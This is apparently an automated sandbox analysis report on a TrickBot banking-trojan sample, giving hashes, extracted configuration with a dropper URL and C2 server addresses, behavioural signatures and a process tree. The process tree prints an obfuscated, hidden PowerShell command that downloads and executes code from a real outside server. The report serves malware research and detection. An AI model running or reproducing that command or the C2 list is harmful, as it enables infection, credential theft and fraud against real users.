trickbot | 97e2a97f378f9af38427493fb965461310ee42dd8d74725223073b8fd0f77e65

General

Target

32.js
Size

463KB
MD5

8f545d23b3544ed3e79ac481de6d2e35
SHA1

2232a67e54f505fbd1d70ae0e18db1f8ed0b307d
SHA256

97e2a97f378f9af38427493fb965461310ee42dd8d74725223073b8fd0f77e65
SHA512

ef0df34055533efc390798bfe0c3875f0bfb5a975012ff77915e4f64c21e4eaf0abdbdeac4d85c74c73dbac9c6744cf4dbe905dc44d089179969516be804d1be

Score

10^/10

trickbot rob109 banker trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://109.248.201.26/lovemetertok.php

Extracted

Family

trickbot

Version

100018

Botnet

rob109

C2

38.110.103.124:443

185.56.76.28:443

204.138.26.60:443

60.51.47.65:443

74.85.157.139:443

68.69.26.182:443

38.110.103.136:443

38.110.103.18:443

138.34.28.219:443

185.56.76.94:443

217.115.240.248:443

24.162.214.166:443

80.15.2.105:443

154.58.23.192:443

38.110.100.104:443

45.36.99.184:443

185.56.76.108:443

185.56.76.72:443

138.34.28.35:443

97.83.40.67:443

Attributes

autorun
Name:pwgrabb
Name:pwgrabc

ecc_pubkey.base64

Signatures

Trickbot
Developed in 2016, TrickBot is one of the more recent banking Trojans.
trojan banker trickbot
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

5 772 powershell.exe
6 772 powershell.exe
Downloads MZ/PE file
Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

1460 rundll32.exe
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

10 wtfismyip.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

772 powershell.exe
772 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exewermgr.exe

description pid process

Token: SeDebugPrivilege 772 powershell.exe
Token: SeDebugPrivilege 2044 wermgr.exe

flow	pid	process
5	772	powershell.exe
6	772	powershell.exe

pid	process
1460	rundll32.exe

flow	ioc
10	wtfismyip.com

pid	process
772	powershell.exe
772	powershell.exe

description	pid	process
Token: SeDebugPrivilege	772	powershell.exe
Token: SeDebugPrivilege	2044	wermgr.exe

Suspicious use of WriteProcessMemory 26 IoCs

Processes:

wscript.execmd.exepowershell.exerundll32.exerundll32.exe

description	pid	process	target process
PID 1104 wrote to memory of 316	1104	wscript.exe	cmd.exe
PID 1104 wrote to memory of 316	1104	wscript.exe	cmd.exe
PID 1104 wrote to memory of 316	1104	wscript.exe	cmd.exe
PID 316 wrote to memory of 772	316	cmd.exe	powershell.exe
PID 316 wrote to memory of 772	316	cmd.exe	powershell.exe
PID 316 wrote to memory of 772	316	cmd.exe	powershell.exe
PID 772 wrote to memory of 588	772	powershell.exe	rundll32.exe
PID 772 wrote to memory of 588	772	powershell.exe	rundll32.exe
PID 772 wrote to memory of 588	772	powershell.exe	rundll32.exe
PID 588 wrote to memory of 1460	588	rundll32.exe	rundll32.exe
PID 588 wrote to memory of 1460	588	rundll32.exe	rundll32.exe
PID 588 wrote to memory of 1460	588	rundll32.exe	rundll32.exe
PID 588 wrote to memory of 1460	588	rundll32.exe	rundll32.exe
PID 588 wrote to memory of 1460	588	rundll32.exe	rundll32.exe
PID 588 wrote to memory of 1460	588	rundll32.exe	rundll32.exe
PID 588 wrote to memory of 1460	588	rundll32.exe	rundll32.exe
PID 1460 wrote to memory of 1300	1460	rundll32.exe	cmd.exe
PID 1460 wrote to memory of 1300	1460	rundll32.exe	cmd.exe
PID 1460 wrote to memory of 1300	1460	rundll32.exe	cmd.exe
PID 1460 wrote to memory of 1300	1460	rundll32.exe	cmd.exe
PID 1460 wrote to memory of 2044	1460	rundll32.exe	wermgr.exe
PID 1460 wrote to memory of 2044	1460	rundll32.exe	wermgr.exe
PID 1460 wrote to memory of 2044	1460	rundll32.exe	wermgr.exe
PID 1460 wrote to memory of 2044	1460	rundll32.exe	wermgr.exe
PID 1460 wrote to memory of 2044	1460	rundll32.exe	wermgr.exe
PID 1460 wrote to memory of 2044	1460	rundll32.exe	wermgr.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\32.js
1⤵
- Suspicious use of WriteProcessMemory
PID:1104

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQAwADkALgAyADQAOAAuADIAMAAxAC4AMgA2AC8AbABvAHYAZQBtAGUAdABlAHIAdABvAGsALgBwAGgAcAAiACkA
2⤵
- Suspicious use of WriteProcessMemory
PID:316

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQAwADkALgAyADQAOAAuADIAMAAxAC4AMgA2AC8AbABvAHYAZQBtAGUAdABlAHIAdABvAGsALgBwAGgAcAAiACkA
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:772

C:\Windows\System32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\beDginLT.bin StartW
4⤵
- Suspicious use of WriteProcessMemory
PID:588

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\beDginLT.bin StartW
5⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1460

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe
6⤵
PID:1300

C:\Windows\system32\wermgr.exe
C:\Windows\system32\wermgr.exe
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2044

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\beDginLT.bin
MD5
e47bc7b7e694bc6ee36b28300516539c

SHA1
2a5e2087d25b8227571b2ace812b828f6e01b85b

SHA256
857a6a12be3d573db9f406bf98ed125383a7630d6dd3504e3c7fe74e451d6af8

SHA512
fc2384f196c5f7089d7c3dcd6312936a255df94e00387797d26c285e4f5014f1cb5031b36c23f4b4bfd868ecc6164bdba16c85cf7f828fd6ab16751dca1890ed

Download Submit
\Users\Admin\AppData\Local\Temp\beDginLT.bin
MD5
e47bc7b7e694bc6ee36b28300516539c

SHA1
2a5e2087d25b8227571b2ace812b828f6e01b85b

SHA256
857a6a12be3d573db9f406bf98ed125383a7630d6dd3504e3c7fe74e451d6af8

SHA512
fc2384f196c5f7089d7c3dcd6312936a255df94e00387797d26c285e4f5014f1cb5031b36c23f4b4bfd868ecc6164bdba16c85cf7f828fd6ab16751dca1890ed

Download Submit
memory/316-60-0x0000000000000000-mapping.dmp

Download
memory/588-70-0x0000000000000000-mapping.dmp

Download
memory/772-67-0x0000000002544000-0x0000000002546000-memory.dmp

Filesize
8KB

Download
memory/772-65-0x0000000002470000-0x0000000002471000-memory.dmp

Filesize
4KB

Download
memory/772-64-0x000000001AB60000-0x000000001AB61000-memory.dmp

Filesize
4KB

Download
memory/772-66-0x0000000002540000-0x0000000002542000-memory.dmp

Filesize
8KB

Download
memory/772-68-0x0000000001EF0000-0x0000000001EF1000-memory.dmp

Filesize
4KB

Download
memory/772-69-0x000000001C2C0000-0x000000001C2C1000-memory.dmp

Filesize
4KB

Download
memory/772-63-0x0000000001EB0000-0x0000000001EB1000-memory.dmp

Filesize
4KB

Download
memory/772-62-0x000007FEFBEF1000-0x000007FEFBEF3000-memory.dmp

Filesize
8KB

Download
memory/772-61-0x0000000000000000-mapping.dmp

Download
memory/1460-72-0x0000000000000000-mapping.dmp

Download
memory/1460-73-0x00000000753E1000-0x00000000753E3000-memory.dmp

Filesize
8KB

Download
memory/1460-75-0x00000000007A0000-0x00000000007DB000-memory.dmp

Filesize
236KB

Download
memory/1460-78-0x0000000000810000-0x0000000000849000-memory.dmp

Filesize
228KB

Download
memory/1460-80-0x0000000000880000-0x00000000008B7000-memory.dmp

Filesize
220KB

Download
memory/1460-82-0x0000000000690000-0x00000000006C8000-memory.dmp

Filesize
224KB

Download
memory/1460-84-0x00000000007F0000-0x00000000007F1000-memory.dmp

Filesize
4KB

Download
memory/1460-83-0x00000000008C0000-0x0000000000904000-memory.dmp

Filesize
272KB

Download
memory/1460-85-0x0000000000261000-0x0000000000263000-memory.dmp

Filesize
8KB

Download
memory/2044-86-0x0000000000000000-mapping.dmp

Download
memory/2044-88-0x0000000000290000-0x0000000000291000-memory.dmp

Filesize
4KB

Download
memory/2044-87-0x0000000000060000-0x0000000000088000-memory.dmp

Filesize
160KB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads